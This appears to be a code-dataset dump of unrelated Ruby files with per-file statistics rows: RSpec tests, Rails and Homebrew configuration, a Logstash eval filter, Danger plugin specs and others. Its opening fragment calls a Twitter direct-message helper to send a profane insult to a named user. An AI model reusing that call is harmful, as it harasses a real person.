address = URI("#{address}?text=#{text}&screen_name=#{screen_name}") if screen_name
address = URI("#{address}?text=#{text}&user_id=#{user_id}") if user_id
request = Net::HTTP::Post.new address.request_uri
authReq = TLS.new
authReq.connect_req address, request
end
end
new_message = Message.new
new_message.direct_message(nil,"larry_lawal","I dont know how nicki became such a big bitch")
| 25.625 | 94 | 0.696341 |
b96d0c08323b67414872086eff88bfddaca9382a | 2,593 | require 'rails_helper'
require 'fileutils'
# rubocop:disable Metrics/BlockLength
RSpec.feature 'DatasetQueuing', type: :feature do
HOLD_SUBMISSIONS_PATH = File.expand_path(File.join(Rails.root, '..', 'hold-submissions.txt')).freeze
# include MerrittHelper
include DatasetHelper
include Mocks::Datacite
# include Mocks::Repository
include Mocks::SubmissionJob
include Mocks::RSolr
include Mocks::Ror
include Mocks::Stripe
include AjaxHelper
before(:each) do
FileUtils.rm(HOLD_SUBMISSIONS_PATH) if File.exist?(HOLD_SUBMISSIONS_PATH)
# mock_repository!
# for this we don't want to mock the whole repository, but just the actual submission to Merritt that happens in
# the queue, Stash::Merritt::SubmissionJob.do_submit!
mock_submission_job!
mock_solr!
mock_ror!
mock_datacite!
mock_stripe!
@curator = create(:user, role: 'admin', tenant_id: 'dryad')
@author = create(:user, tenant_id: 'dryad', role: 'superuser')
@document_list = []
end
after(:each) do
FileUtils.rm(HOLD_SUBMISSIONS_PATH) if File.exist?(HOLD_SUBMISSIONS_PATH)
end
describe :submitting_quickly do
before(:each, js: true) do
ActionMailer::Base.deliveries = []
# Sign in and create a new dataset
sign_in(@author)
visit root_path
click_link 'My Datasets'
3.times do
start_new_dataset
fill_required_fields
navigate_to_review
check 'agree_to_license'
check 'agree_to_tos'
check 'agree_to_payment'
click_button 'submit_dataset'
end
@resource = StashEngine::Resource.where(user: @author).last
end
it 'should show queuing', js: true do
visit '/stash/submission_queue'
wait_for_ajax(15)
expect(page).to have_content(/[01] are currently processing from this server/)
expect(page).to have_content(/[23] queued on this server/)
end
it 'should pause transfers', js: true do
visit '/stash/submission_queue'
click_button 'graceful_shutdown'
click_link 'go back to viewing queue updates'
wait_for_ajax(15)
expect(page).to have_text('Submissions are being held for shutdown on this server')
end
it 'should re-enable transfers', js: true do
FileUtils.touch(HOLD_SUBMISSIONS_PATH)
visit '/stash/submission_queue'
click_button 'graceful_start'
click_link 'go back to viewing queue updates'
wait_for_ajax(15)
expect(page).to have_text('Normal submissions in effect on this server')
end
end
end
# rubocop:enable Metrics/BlockLength
| 30.869048 | 116 | 0.699961 |
1cc0d1536ae3c5351fd2f3d48858d7d64b81a479 | 3,467 | # frozen_string_literal: true
require 'simplecov'
require 'simplecov-json'
SimpleCov.formatters = [
SimpleCov::Formatter::HTMLFormatter
]
MINIMUM_COVERAGE = 27
SimpleCov.at_exit do
if SimpleCov.result.covered_percent < MINIMUM_COVERAGE
abort "Too low coverage. Expected #{MINIMUM_COVERAGE} was #{SimpleCov.result.covered_percent}"
end
SimpleCov.result.format!
end
SimpleCov.start 'rails' do
add_filter 'vendor'
end
# This file is copied to spec/ when you run 'rails generate rspec:install'
require 'spec_helper'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../config/environment', __dir__)
require 'action_cable/testing/rspec'
# Prevent database truncation if the environment is production
abort('The Rails environment is running in production mode!') if Rails.env.production?
require 'rspec/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec', 'support', '**', '*.rb')].each { |f| require f }
# Checks for pending migrations and applies them before tests are run.
# If you are not using ActiveRecord, you can remove these lines.
begin
ActiveRecord::Migration.maintain_test_schema!
rescue ActiveRecord::PendingMigrationError => error
puts error.to_s.strip
exit 1
end
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
config.include FactoryBot::Syntax::Methods
config.include Devise::Test::ControllerHelpers, type: :controller
config.before(:each, altering_database: true) do
DatabaseCleaner.strategy = :truncation
end
end
| 36.882979 | 98 | 0.75512 |
1ab4f413fa2b76c2a6926001336bd6525a8320a4 | 127 | covers 'facets/file/null'
test_case File do
class_method :null do
test do
assert File.null
end
end
end
| 8.466667 | 25 | 0.645669 |
61201cb724fe5250869151c66c213b9db4252287 | 880 | module Dashing
module Generators
class InstallGenerator < ::Rails::Generators::Base
source_root File.expand_path('../../templates', __FILE__)
desc 'Creates a Dashing initializer for your application.'
def install
route 'mount Dashing::Engine, at: Dashing.config.engine_path'
end
def copy_initializer
template 'initializer.rb', 'config/initializers/dashing.rb'
end
def copy_dashboard
template 'dashboards/sample.html.erb', 'app/views/dashing/dashboards/sample.html.erb'
end
def copy_widget_manifests
template 'widgets/index.css', 'app/assets/stylesheets/dashing/widgets/index.css'
template 'widgets/index.js', 'app/assets/javascripts/dashing/widgets/index.js'
end
def copy_job
template 'jobs/sample.rb', 'app/jobs/sample.rb'
end
end
end
end
| 26.666667 | 93 | 0.675 |
f87660d7a21d296efca7258519ebe668882427ba | 2,861 | CurationConcerns.configure do |config|
# Injected via `rails g geo_concerns:install`
config.register_curation_concern :vector_work
config.register_curation_concern :raster_work
config.register_curation_concern :image_work
config.minter_statefile = "log/minter-state"
# Should schema.org microdata be displayed?
# config.display_microdata = true
# What default microdata type should be used if a more appropriate
# type can not be found in the locale file?
# config.microdata_default_type = 'http://schema.org/CreativeWork'
# How frequently should a file be audited.
# Note: In CurationConcerns you must trigger the FileSetAuditService manually.
# config.max_days_between_audits = 7
# Enable displaying usage statistics in the UI
# Requires a Google Analytics id and OAuth2 keyfile. See README for more info
# config.analytics = false
# Specify a date you wish to start collecting Google Analytic statistics for.
# config.analytic_start_date = DateTime.new(2014,9,10)
# Where to store tempfiles, leave blank for the system temp directory (e.g. /tmp)
config.temp_file_base = File.join(Rails.root, 'tmp')
# Location on local file system where derivatives will be stored.
# If you use a multi-server architecture, this MUST be a shared volume.
config.derivatives_path = File.join(Rails.root, 'tmp', 'derivatives')
# Location on local file system where uploaded files will be staged
# prior to being ingested into the repository or having derivatives generated.
# If you use a multi-server architecture, this MUST be a shared volume.
config.working_path = File.join(Rails.root, 'tmp', 'uploads')
# If you have ffmpeg installed and want to transcode audio and video uncomment this line
# config.enable_ffmpeg = true
# CurationConcerns uses NOIDs for files and collections instead of Fedora UUIDs
# where NOID = 10-character string and UUID = 32-character string w/ hyphens
# config.enable_noids = true
# Specify a different template for your repository's NOID IDs
# config.noid_template = ".reeddeeddk"
# Store identifier minter's state in a file for later replayability
# If you use a multi-server architecture, this MUST be on a shared volume.
# config.minter_statefile = '/tmp/minter-state'
# Specify whether the media display partial should render a download link
# config.display_media_download_link = true
# Specify the path to the file characterization tool:
# config.fits_path = "fits.sh"
# Specify a date you wish to start collecting Google Analytic statistics for.
# Leaving it blank will set the start date to when ever the file was uploaded by
# NOTE: if you have always sent analytics to GA for downloads and page views leave this commented out
# config.analytic_start_date = DateTime.new(2014,9,10)
end
Date::DATE_FORMATS[:standard] = '%m/%d/%Y'
| 44.015385 | 103 | 0.761622 |
4ae94c028bd0ee647e0cc3f8420c758a46a73c04 | 159 | dir = File.dirname(__FILE__)
Dir[File.expand_path("#{dir}/*.rb")].uniq.each do |file|
if file =~ /\/test_\w+\.rb$/
puts file
require file
end
end | 22.714286 | 56 | 0.616352 |
4aa56a65a679a192fd7c566e0e7976f7d8cbb043 | 1,047 | # encoding: utf-8
require "logstash/filters/base"
require "logstash/namespace"
# Execute ruby code.
#
# For example, to cancel 90% of events, you can do this:
# [source,ruby]
# filter {
# ruby {
# # Cancel 90% of events
# code => "event.cancel if rand <= 0.90"
# }
# }
#
class LogStash::Filters::Ruby < LogStash::Filters::Base
config_name "ruby"
# Any code to execute at logstash startup-time
config :init, :validate => :string
# The code to execute for every event.
# You will have an `event` variable available that is the event itself.
config :code, :validate => :string, :required => true
public
def register
# TODO(sissel): Compile the ruby code
eval(@init, binding, "(ruby filter init)") if @init
eval("@codeblock = lambda { |event| #{@code} }", binding, "(ruby filter code)")
end # def register
public
def filter(event)
return unless filter?(event)
@codeblock.call(event)
filter_matched(event)
end # def filter
end # class LogStash::Filters::Ruby
| 24.928571 | 83 | 0.647564 |
b9d85a235d075bb5df36b081b24b570099e2538d | 1,194 | # frozen_string_literal: true
require_relative 'helper'
class TestFakerFoodPL < Test::Unit::TestCase
include DeterministicHelper
assert_methods_are_deterministic(
FFaker::FoodPL,
:food, :processed, :unprocessed, :vegetable, :fruit,
:meat, :herb, :spice, :fermented, :diary, :preserves
)
def setup
@tester = FFaker::FoodPL
end
def test_food
assert_match(/\w+/, @tester.food)
end
def test_processed
assert_match(/\w+/, @tester.processed)
end
def test_unprocessed
assert_match(/\w+/, @tester.unprocessed)
end
def test_vegetable
assert_include(@tester::VEGETABLES, @tester.vegetable)
end
def test_fruit
assert_include(@tester::FRUITS, @tester.fruit)
end
def test_herb
assert_include(@tester::HERBS, @tester.herb)
end
def test_spice
assert_include(@tester::SPICES, @tester.spice)
end
def test_meat
assert_include(@tester::MEATS, @tester.meat)
end
def test_fermented
assert_include(@tester::FERMENTED, @tester.fermented)
end
def test_diary
assert_include(@tester::DIARY, @tester.diary)
end
def test_preserves
assert_include(@tester::PRESERVES, @tester.preserves)
end
end
| 19.258065 | 58 | 0.710218 |
267e7bbc249e303efcd3238f76b3b60caccb2fc7 | 2,098 | module QA
module Page
module Project
class Show < Page::Base
include Page::Component::ClonePanel
view 'app/views/projects/_last_push.html.haml' do
element :create_merge_request
end
view 'app/views/projects/_home_panel.html.haml' do
element :project_name
end
view 'app/views/layouts/header/_new_dropdown.haml' do
element :new_menu_toggle
element :new_issue_link, "link_to _('New issue'), new_project_issue_path(@project)"
end
view 'app/views/shared/_ref_switcher.html.haml' do
element :branches_select
element :branches_dropdown
end
view 'app/views/projects/buttons/_fork.html.haml' do
element :fork_label, "%span= s_('ProjectOverview|Fork')"
element :fork_link, "link_to new_project_fork_path(@project)"
end
view 'app/views/projects/_files.html.haml' do
element :tree_holder, '.tree-holder'
end
view 'app/presenters/project_presenter.rb' do
element :new_file_button, "_('New file'),"
end
def project_name
find('.qa-project-name').text
end
def go_to_new_file!
click_on 'New file'
end
def switch_to_branch(branch_name)
find_element(:branches_select).click
within_element(:branches_dropdown) do
click_on branch_name
end
end
def last_commit_content
find_element(:commit_content).text
end
def new_merge_request
wait(reload: true) do
has_css?(element_selector_css(:create_merge_request))
end
click_element :create_merge_request
end
def wait_for_import
wait(reload: true) do
has_css?('.tree-holder')
end
end
def go_to_new_issue
click_element :new_menu_toggle
click_link 'New issue'
end
def fork_project
click_on 'Fork'
end
end
end
end
end
| 24.682353 | 93 | 0.595329 |
1c616507234829f0c5e971aeb54fb188dfc7864f | 1,981 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Cat
module Actions
module ParamsRegistry
extend self
# A Mapping of all the actions to their list of valid params.
#
# @since 6.1.1
PARAMS = {}
# Register an action with its list of valid params.
#
# @example Register the action.
# ParamsRegistry.register(:benchmark, [ :verbose ])
#
# @param [ Symbol ] action The action to register.
# @param [ Array[Symbol] ] valid_params The list of valid params.
#
# @since 6.1.1
def register(action, valid_params)
PARAMS[action.to_sym] = valid_params
end
# Get the list of valid params for a given action.
#
# @example Get the list of valid params.
# ParamsRegistry.get(:benchmark)
#
# @param [ Symbol ] action The action.
#
# @return [ Array<Symbol> ] The list of valid params for the action.
#
# @since 6.1.1
def get(action)
PARAMS.fetch(action, [])
end
end
end
end
end
end
| 32.47541 | 78 | 0.61686 |
d5d401e45fa90d3cc5e7a11f6eef1d463ab08326 | 147 | append_file '.gitignore', <<-ignores
.ackrc
.rvmrc
config/database.yml
.bundle
db/*.sqlite3
log/*.log
tmp/
.sass-cache/
.rvmrc
*.DS_Store
ignores
| 10.5 | 36 | 0.727891 |
ac647725cb6feef7aaf578c44aba4292f7baee28 | 1,521 | # encoding: utf-8
# copyright: 2015, Vulcano Security GmbH
require 'utils/simpleconfig'
module Inspec::Resources
class NtpConf < Inspec.resource(1)
name 'ntp_conf'
supports platform: 'unix'
desc 'Use the ntp_conf InSpec audit resource to test the synchronization settings defined in the ntp.conf file. This file is typically located at /etc/ntp.conf.'
example "
describe ntp_conf do
its('server') { should_not eq nil }
its('restrict') { should include '-4 default kod notrap nomodify nopeer noquery'}
end
"
def initialize(path = nil)
@conf_path = path || '/etc/ntp.conf'
end
def method_missing(name)
param = read_params[name.to_s]
# extract first value if we have only one value in array
return param[0] if param.is_a?(Array) and param.length == 1
param
end
def to_s
'ntp.conf'
end
private
def read_params
return @params if defined?(@params)
if !inspec.file(@conf_path).file?
skip_resource "Can't find file \"#{@conf_path}\""
return @params = {}
end
content = inspec.file(@conf_path).content
if content.empty? && !inspec.file(@conf_path).empty?
skip_resource "Can't read file \"#{@conf_path}\""
return @params = {}
end
# parse the file
conf = SimpleConfig.new(
content,
assignment_regex: /^\s*(\S+)\s+(.*)\s*$/,
multiple_values: true,
)
@params = conf.params
end
end
end
| 25.779661 | 165 | 0.617357 |
3832eb315f84f8fff8c50e8fe0d7a668ad580152 | 575 | FactoryBot.define do
factory :staff_member do
email { Faker::Internet.email }
family_name { Faker::Japanese::Name.last_name }
given_name { Faker::Japanese::Name.first_name }
family_name_kana { family_name ? family_name.yomi : Faker::Japanese::Name.last_name.yomi }
given_name_kana { given_name ? given_name.yomi : Faker::Japanese::Name.first_name.yomi }
password { Faker::Internet.password }
start_date { Time.zone.yesterday }
end_date { Time.zone.tomorrow }
suspended false
end
end
| 41.071429 | 94 | 0.657391 |
267161d96de20a0a6e531aaccd6559cffba6e697 | 2,007 | module Fog
module AWS
class IAM
class Real
require 'fog/aws/parsers/iam/list_server_certificates'
# List server certificates
#
# ==== Parameters
# * options<~Hash>:
# * 'Marker'<~String> - The marker from the previous result (for pagination)
# * 'MaxItems'<~String> - The maximum number of server certificates you want in the response
# * 'PathPrefix'<~String> - The path prefix for filtering the results
#
# ==== Returns
# * response<~Excon::Response>:
# * body<~Hash>:
# * 'Certificates'<~Array> - Matching server certificates
# * server_certificate<~Hash>:
# * Arn<~String> -
# * Path<~String> -
# * ServerCertificateId<~String> -
# * ServerCertificateName<~String> -
# * UploadDate<~Time> -
# * 'IsTruncated'<~Boolean> - Whether or not the results were truncated
# * 'Marker'<~String> - appears when IsTruncated is true as the next marker to use
#
# ==== See Also
# http://docs.amazonwebservices.com/IAM/latest/APIReference/index.html?API_ListServerCertificates.html
#
def list_server_certificates(options = {})
request({
'Action' => 'ListServerCertificates',
:parser => Fog::Parsers::AWS::IAM::ListServerCertificates.new
}.merge!(options))
end
end
class Mock
def list_server_certificates(options = {})
certificates = self.data[:server_certificates].values
certificates = certificates.select { |certificate| certificate['Path'] =~ Regexp.new("^#{options['PathPrefix']}") } if options['PathPrefix']
response = Excon::Response.new
response.status = 200
response.body = {
'Certificates' => certificates
}
response
end
end
end
end
end
| 35.210526 | 150 | 0.55705 |
873d8e1f0e338e9282346a73db0c93bda0b10716 | 2,930 | require 'helper'
##
# Test class
class TestLoadFile < Test::Unit::TestCase
# Path to test files
TMP_STRING_PATH = 'test/files/tmp.strings.dat'
STRING_PATH = 'test/files/strings.dat'
# Called before every test method runs. Can be used
# to set up fixture information.
def setup
@storage = Storage::Trie.new
end
##
# Check if methods exist
def test_respond_to
assert_respond_to @storage, :load_from_file
assert_respond_to @storage, :save_to_file
end
##
#
def test_load_from_file_path
@storage.load_from_file(STRING_PATH)
assert_equal ['php'], @storage.find('php')
assert @storage.contains?('php')
assert_equal ['Pascal'], @storage.find('Pascal')
assert @storage.contains?('Pascal')
assert_equal %w(php mathematica occam oxygene pascal seed7).sort, @storage.to_a.sort
end
##
#
def test_load_from_file_object
@storage.load_from_file(File.new(STRING_PATH, 'r'))
assert_equal ['php'], @storage.find('php')
assert @storage.contains?('php')
assert_equal ['Pascal'], @storage.find('Pascal')
assert @storage.contains?('Pascal')
assert_equal %w(php mathematica occam oxygene pascal seed7).sort, @storage.to_a.sort
end
##
#
def test_save_to_file_path
@storage.add('java')
@storage.add('java script')
@storage.add('perl')
@storage.add('rust')
@storage.add('Smalltalk')
@storage.add('Scheme')
@storage.save_to_file(TMP_STRING_PATH)
test_write = Storage::Trie.new
test_write.load_from_file(TMP_STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme'].sort, test_write.to_a.sort
# Test for append load
test_write.load_from_file(STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme', 'php', 'mathematica', 'occam', 'oxygene', 'pascal', 'seed7'].sort, test_write.to_a.sort
end
##
#
def test_save_to_file_object
@storage.add('java')
@storage.add('java script')
@storage.add('perl')
@storage.add('rust')
@storage.add('Smalltalk')
@storage.add('Scheme')
@storage.save_to_file(File.new(TMP_STRING_PATH, 'w'))
test_write = Storage::Trie.new
test_write.load_from_file(TMP_STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme'].sort, test_write.to_a.sort
# Test for append load
test_write.load_from_file(STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme', 'php', 'mathematica', 'occam', 'oxygene', 'pascal', 'seed7'].sort, test_write.to_a.sort
end
# Called after every test method runs. Can be used to tear
# down fixture information.
def teardown
# Delete file
File.delete(TMP_STRING_PATH) if File.exist?(TMP_STRING_PATH)
end
end | 25.478261 | 168 | 0.652218 |
3311a6bbfc18fc6346b4138abd082058ca34e3aa | 6,629 | require "cases/helper"
class Dog
include ActiveModel::Validations
include ActiveModel::Validations::Callbacks
attr_accessor :name, :history
def initialize
@history = []
end
end
class DogWithMethodCallbacks < Dog
before_validation :set_before_validation_marker
after_validation :set_after_validation_marker
def set_before_validation_marker; history << "before_validation_marker"; end
def set_after_validation_marker; history << "after_validation_marker" ; end
end
class DogValidatorsAreProc < Dog
before_validation { history << "before_validation_marker" }
after_validation { history << "after_validation_marker" }
end
class DogWithTwoValidators < Dog
before_validation { history << "before_validation_marker1" }
before_validation { history << "before_validation_marker2" }
end
class DogBeforeValidatorReturningFalse < Dog
before_validation { false }
before_validation { history << "before_validation_marker2" }
end
class DogBeforeValidatorThrowingAbort < Dog
before_validation { throw :abort }
before_validation { history << "before_validation_marker2" }
end
class DogAfterValidatorReturningFalse < Dog
after_validation { false }
after_validation { history << "after_validation_marker" }
end
class DogWithMissingName < Dog
before_validation { history << "before_validation_marker" }
validates_presence_of :name
end
class DogValidatorWithOnCondition < Dog
before_validation :set_before_validation_marker, on: :create
after_validation :set_after_validation_marker, on: :create
def set_before_validation_marker; history << "before_validation_marker"; end
def set_after_validation_marker; history << "after_validation_marker" ; end
end
class DogValidatorWithOnMultipleCondition < Dog
before_validation :set_before_validation_marker_on_context_a, on: :context_a
before_validation :set_before_validation_marker_on_context_b, on: :context_b
after_validation :set_after_validation_marker_on_context_a, on: :context_a
after_validation :set_after_validation_marker_on_context_b, on: :context_b
def set_before_validation_marker_on_context_a; history << "before_validation_marker on context_a"; end
def set_before_validation_marker_on_context_b; history << "before_validation_marker on context_b"; end
def set_after_validation_marker_on_context_a; history << "after_validation_marker on context_a" ; end
def set_after_validation_marker_on_context_b; history << "after_validation_marker on context_b" ; end
end
class DogValidatorWithIfCondition < Dog
before_validation :set_before_validation_marker1, if: -> { true }
before_validation :set_before_validation_marker2, if: -> { false }
after_validation :set_after_validation_marker1, if: -> { true }
after_validation :set_after_validation_marker2, if: -> { false }
def set_before_validation_marker1; history << "before_validation_marker1"; end
def set_before_validation_marker2; history << "before_validation_marker2" ; end
def set_after_validation_marker1; history << "after_validation_marker1"; end
def set_after_validation_marker2; history << "after_validation_marker2" ; end
end
class CallbacksWithMethodNamesShouldBeCalled < ActiveModel::TestCase
def test_if_condition_is_respected_for_before_validation
d = DogValidatorWithIfCondition.new
d.valid?
assert_equal ["before_validation_marker1", "after_validation_marker1"], d.history
end
def test_on_condition_is_respected_for_validation_with_matching_context
d = DogValidatorWithOnCondition.new
d.valid?(:create)
assert_equal ["before_validation_marker", "after_validation_marker"], d.history
end
def test_on_condition_is_respected_for_validation_without_matching_context
d = DogValidatorWithOnCondition.new
d.valid?(:save)
assert_equal [], d.history
end
def test_on_condition_is_respected_for_validation_without_context
d = DogValidatorWithOnCondition.new
d.valid?
assert_equal [], d.history
end
def test_on_multiple_condition_is_respected_for_validation_with_matching_context
d = DogValidatorWithOnMultipleCondition.new
d.valid?(:context_a)
assert_equal ["before_validation_marker on context_a", "after_validation_marker on context_a"], d.history
d = DogValidatorWithOnMultipleCondition.new
d.valid?(:context_b)
assert_equal ["before_validation_marker on context_b", "after_validation_marker on context_b"], d.history
d = DogValidatorWithOnMultipleCondition.new
d.valid?([:context_a, :context_b])
assert_equal([
"before_validation_marker on context_a",
"before_validation_marker on context_b",
"after_validation_marker on context_a",
"after_validation_marker on context_b"
], d.history)
end
def test_on_multiple_condition_is_respected_for_validation_without_matching_context
d = DogValidatorWithOnMultipleCondition.new
d.valid?(:save)
assert_equal [], d.history
end
def test_on_multiple_condition_is_respected_for_validation_without_context
d = DogValidatorWithOnMultipleCondition.new
d.valid?
assert_equal [], d.history
end
def test_before_validation_and_after_validation_callbacks_should_be_called
d = DogWithMethodCallbacks.new
d.valid?
assert_equal ["before_validation_marker", "after_validation_marker"], d.history
end
def test_before_validation_and_after_validation_callbacks_should_be_called_with_proc
d = DogValidatorsAreProc.new
d.valid?
assert_equal ["before_validation_marker", "after_validation_marker"], d.history
end
def test_before_validation_and_after_validation_callbacks_should_be_called_in_declared_order
d = DogWithTwoValidators.new
d.valid?
assert_equal ["before_validation_marker1", "before_validation_marker2"], d.history
end
def test_further_callbacks_should_not_be_called_if_before_validation_throws_abort
d = DogBeforeValidatorThrowingAbort.new
output = d.valid?
assert_equal [], d.history
assert_equal false, output
end
def test_further_callbacks_should_be_called_if_before_validation_returns_false
d = DogBeforeValidatorReturningFalse.new
output = d.valid?
assert_equal ["before_validation_marker2"], d.history
assert_equal true, output
end
def test_further_callbacks_should_be_called_if_after_validation_returns_false
d = DogAfterValidatorReturningFalse.new
d.valid?
assert_equal ["after_validation_marker"], d.history
end
def test_validation_test_should_be_done
d = DogWithMissingName.new
output = d.valid?
assert_equal ["before_validation_marker"], d.history
assert_equal false, output
end
end
| 35.449198 | 109 | 0.802383 |
4abf94b479aa062330bfd759593506676fcdde6f | 3,659 | require File.expand_path('../spec_helper', __FILE__)
module Danger
describe Danger::DangerCodeStyleValidation do
it 'should be a plugin' do
expect(Danger::DangerCodeStyleValidation.new(nil)).to be_a Danger::Plugin
end
describe 'with Dangerfile' do
before do
@dangerfile = testing_dangerfile
@my_plugin = @dangerfile.code_style_validation
end
it 'Reports code style violation as error' do
diff = File.read('spec/fixtures/violated_diff.diff')
expected_message = File.read('spec/fixtures/violated_diff_message.md')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check file_extensions: ['.h', '.m', '.mm', '.cpp']
expect(@dangerfile.status_report[:errors]).to eq([DangerCodeStyleValidation::VIOLATION_ERROR_MESSAGE])
expect(@dangerfile.status_report[:markdowns].map(&:message).join("\n")).to eq(expected_message)
end
it 'Does not report error when extension is excluded' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check validator: 'clang-format',
file_extensions: ['.h', '.c']
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Accepts a validator other than clang-format' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check validator: 'yapf',
file_extensions: ['.py']
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Does not report error when code not violated' do
diff = File.read('spec/fixtures/innocent_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Does not report error for different extension types of files' do
diff = File.read('spec/fixtures/ruby_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Does not report unexpected errors when there are only removals in the diff' do
diff = File.read('spec/fixtures/red_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Ignores files matching ignored patterns' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check file_extensions: ['.h', '.m'],
ignore_file_patterns: [%r{^spec/}]
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Allows single pattern instead of array' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check ignore_file_patterns: %r{^spec/}
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Allows single file extension instead of array' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check file_extensions: '.m'
expect(@dangerfile.status_report[:errors]).to eq([DangerCodeStyleValidation::VIOLATION_ERROR_MESSAGE])
end
end
end
end
| 35.524272 | 110 | 0.657557 |
1cce5380bd0c918959b5f46c4a42df246c400d4f | 224 | require './config/environment'
if ActiveRecord::Migrator.needs_migration?
raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.'
end
run ApplicationController
use ItemsController
use UsersController
| 22.4 | 77 | 0.8125 |
ffb50896ef050ee14f2a398ff76219b8ade4fc77 | 165 | module Groupby
module Model
class CustomUrlParam < Serializable
# string @key
# string @value
attr_accessor :key, :value
end
end
end | 13.75 | 39 | 0.636364 |
bb926ce0bbc7e787de8aa783955f3556bc5ffc3e | 1,784 | class MesonInternal < Formula
include Language::Python::Virtualenv
desc "Fast and user friendly build system"
homepage "https://mesonbuild.com/"
url "https://github.com/mesonbuild/meson/releases/download/0.46.1/meson-0.46.1.tar.gz"
sha256 "19497a03e7e5b303d8d11f98789a79aba59b5ad4a81bd00f4d099be0212cee78"
license "Apache-2.0"
revision 1
bottle do
sha256 cellar: :any_skip_relocation, catalina: "2081b7b2d37614f170b2b55855d77bd2788922a02103da66f2d0d33952541a3f"
sha256 cellar: :any_skip_relocation, mojave: "c00f702a075153263b34ade26d43a9a3a98673b6b8d30ce7d17e36581b16f2bf"
sha256 cellar: :any_skip_relocation, high_sierra: "e5c4655a955250b17edc8fbd17a3bd56b5a99d1fc34db303f2bfa684a2c76167"
end
keg_only <<~EOS
this formula contains a heavily patched version of the meson build system and
is exclusively used internally by other formulae.
Users are advised to run `brew install meson` to install
the official meson build
EOS
depends_on "ninja"
depends_on "[email protected]"
# see https://github.com/mesonbuild/meson/pull/2577
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/a20d7df94112f93ea81f72ff3eacaa2d7e681053/meson-internal/meson-osx.patch?full_index=1"
sha256 "d8545f5ffbb4dcc58131f35a9a97188ecb522c6951574c616d0ad07495d68895"
end
def install
virtualenv_install_with_resources
end
test do
(testpath/"helloworld.c").write <<~EOS
main() {
puts("hi");
return 0;
}
EOS
(testpath/"meson.build").write <<~EOS
project('hello', 'c')
executable('hello', 'helloworld.c')
EOS
mkdir testpath/"build" do
system "#{bin}/meson", ".."
assert_predicate testpath/"build/build.ninja", :exist?
end
end
end
| 32.436364 | 153 | 0.740471 |
91b3e6059f0b7d22932cd4580f1fde37b92565ea | 206 | class PreferredView < ActiveRecord::Migration
def self.up
add_column :users, :preferred_view, :string, :default => :expanded
end
def self.down
remove_column :users, :preferred_view
end
end
| 20.6 | 70 | 0.728155 |
ac758a6c762f74e92d22fee2314701379166531f | 491 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2020_06_01
module Models
#
# Defines values for ResourceIdentityType
#
module ResourceIdentityType
SystemAssigned = "SystemAssigned"
UserAssigned = "UserAssigned"
SystemAssignedUserAssigned = "SystemAssigned, UserAssigned"
None = "None"
end
end
